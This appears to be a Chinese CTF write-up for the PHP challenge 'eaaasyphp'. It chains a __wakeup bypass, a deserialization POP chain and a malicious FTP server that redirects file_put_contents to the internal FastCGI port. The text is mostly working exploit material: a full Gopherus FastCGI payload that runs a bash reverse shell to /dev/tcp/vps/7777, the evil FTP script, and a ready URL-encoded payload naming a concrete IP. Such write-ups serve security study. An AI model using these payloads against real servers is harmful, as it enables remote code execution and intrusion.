eaaasyphp
文章目錄
- eaaasyphp
- 讀取phpinfo
- 打fastcgi
- 惡意的ftp服務
- 構造pop鏈
- 參考鏈接
題目給出了原始碼
讀取phpinfo
嘗試反序列化讀取phpinfo

但是__wakeup()函式先於__destruct()函式執行,所以需要繞過__wakeup():
PHP :: Bug #81151 :: bypass __wakeup
?code=C:4:"Hint":0:{}
注意這個FPM/FastCGI

打fastcgi
使用Gopherus生成打fastcgi的payload:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_
PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCR
IPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp
/vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
同時還要在自己的vps上起一個惡意的ftp服務
惡意的ftp服務
ftp服務
# evil_ftp.py
import socket
# Minimal scripted FTP control channel for the write-up: it answers with a
# fixed sequence of replies and never reads what the client sends (there is no
# recv() anywhere), so the comments below record which client command each
# reply is assumed to answer.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 7008))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
# Service ready for new user.
# Client sends the anonymous username.
# USER anonymous
conn.send(b'331 Please specify the password.\n')
# User name okay, need password.
# Client sends the anonymous password.
# PASS anonymous
conn.send(b'230 Login successful.\n')
# User logged in, proceed. Logged out if appropriate.
# TYPE I
conn.send(b'200 Switching to Binary mode.\n')
# SIZE /
conn.send(b'550 Could not get the file size.\n')
# EPSV (1)
conn.send(b'150 ok\n')
# PASV
# The 227 reply names 127.0.0.1 port 9000 as the passive data endpoint, i.e.
# the client's own loopback address (the FPM/FastCGI port named earlier in the
# write-up): the client then opens its data connection there rather than back
# to this host. Defensively, this is why a PHP process should not be able to
# reach remote ftp:// URLs (allow_url_fopen) from attacker-supplied paths.
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') # STOR / (2)
conn.send(b'150 Permission denied.\n')
# QUIT
conn.send(b'221 Goodbye.\n')
conn.close()
# NOTE(review): the listening socket `s` is never closed; it is released only
# when the interpreter exits.
構造pop鏈
構造pop鏈觸發Bunny類中的file_put_contents
unserialize——>Bypass類的__destruct()函式——>Welcome類的__invoke()函式——>Bunny類的__toString()函式——>呼叫其file_put_contents()打內網的fpm
(vps自行修改)
<?php
class Check
{
    /** Gate read by Bypass::__destruct(); flipped to true by Esle::__wakeup(). */
    public static bool $str1 = false;

    /** Gate read by Bunny::__toString(); flipped to true by Welcome::__invoke(). */
    public static bool $str2 = false;
}
class Esle
{
    /**
     * Runs when an Esle instance is unserialized: opens the gate that
     * Bypass::__destruct() checks before it invokes its callable.
     */
    public function __wakeup(): void
    {
        Check::$str1 = true;
    }
}
class Hint {
// On a normal unserialize() this runs first and gives $hint a truthy value,
// so the __destruct() branch below is skipped.
public function __wakeup(){
$this->hint = "no hint";
}
// phpinfo() is reachable here only when __wakeup() does not run; the write-up
// does that by serializing with the C: format instead of O: (PHP bug #81151).
// Sink: a string held in object state is invoked as a callable. The class
// declares no $hint property, so when __wakeup() was skipped the read yields
// null (with a warning), the branch is taken and phpinfo() is called.
// Defensive takeaway: a destructor must not trust state that unserialize()
// may have populated, and should never call a callable derived from it.
public function __destruct(){
if(!$this->hint){
$this->hint = "phpinfo";
($this->hint)();
}
}
}
class Bunny {
// __toString() fires whenever the object is treated as a string,
// e.g. $b = new Bunny(); echo $b; — in the chain on this page it is reached
// through the "Welcome" . $this->username concatenation in Welcome::__invoke().
// NOTE(review): the method returns nothing; PHP reports that __toString()
// must return a string once it finishes, but file_put_contents() below has
// already executed by then.
public function __toString()
{
if (Check::$str2) {
// $data falls back to a request parameter: attacker-controlled content.
if(!$this->data){
$this->data = $_REQUEST['data'];
}
// Writes attacker-controlled content to an attacker-controlled path
// ($filename arrives via unserialize()). The write-up notes that plain file
// writes are blocked on the target, but PHP stream wrappers such as ftp://
// still apply, which is how the write reaches the internal FPM port.
// Defensive takeaway: never unserialize() untrusted input, and disable
// allow_url_fopen where remote wrappers are not needed.
file_put_contents($this->filename, $this->data);
} else {
throw new Error("Error");
}
}
}
class Welcome
{
    /**
     * Runs when the object is called like a function ($a = new Welcome(); $a();),
     * which is how Bypass::__destruct() reaches it. Opens the gate checked by
     * Bunny::__toString() and then formats a greeting from $this->username;
     * formatting with %s is what turns an object in $username into a string,
     * triggering its __toString().
     */
    public function __invoke(): string
    {
        Check::$str2 = true;

        return sprintf('Welcome%s', $this->username);
    }
}
class Bypass
{
    /** In the chain on this page this holds the Esle whose __wakeup() opens the $str1 gate. */
    public $aaa;

    /**
     * Destructor: refuses with an Error while the $str1 gate is closed; once it
     * is open, invokes whatever is stored in the dynamic $str4 property (a
     * Welcome object in the chain, so its __invoke() runs).
     */
    public function __destruct(): void
    {
        if (!Check::$str1) {
            throw new Error("Error");
        }

        ($this->str4)();
    }
}
// Builds the chain described above:
// unserialize() -> Esle::__wakeup() opens $str1 -> Bypass::__destruct() calls
// Welcome::__invoke(), which opens $str2 and concatenates $username ->
// Bunny::__toString() -> file_put_contents($filename, $_REQUEST['data']).
$a = new Bypass();
$a->aaa = new Esle();
$a->str4 = new Welcome();
$a->str4->username = new Bunny();
// "vps" is a placeholder for the host running the FTP script above; the port
// matches that script's bind() (7008).
$a->str4->username->filename = "ftp://aaa@vps:7008/123";
echo urlencode(serialize($a));
// NOTE(review): when this generator script exits, Bypass::__destruct() runs
// with Check::$str1 still false (nothing was unserialized here), so an
// uncaught Error("Error") presumably follows the printed payload; the payload
// itself has already been echoed.
/*
if (isset($_GET['code'])) {
unserialize($_GET['code']);
} else {
highlight_file(__FILE__);
}*/
打內網的fpm這一點類似於[藍帽杯2021 one point php]:[藍帽杯 2021]One Pointer PHP_Sk1y的博客-CSDN博客
payload(vps自行修改)
?code=O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A3%3A%22aaa%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Ds%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A33%3A%22ftp%3A%2F%2Faaa%40116.62.240.148%3A7008%2F123%22%3B%7D%7D%7D&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
運行ftp.py,在vps的7008埠開啟ftp惡意服務
python3 ftp.py
監聽vps的7777埠,

參考鏈接
- PHP :: Bug #81151 :: bypass __wakeup
- 隴原戰疫2021網路安全大賽 Web_feng的博客-CSDN博客
- One Pointer PHP_Sk1y的博客-CSDN博客
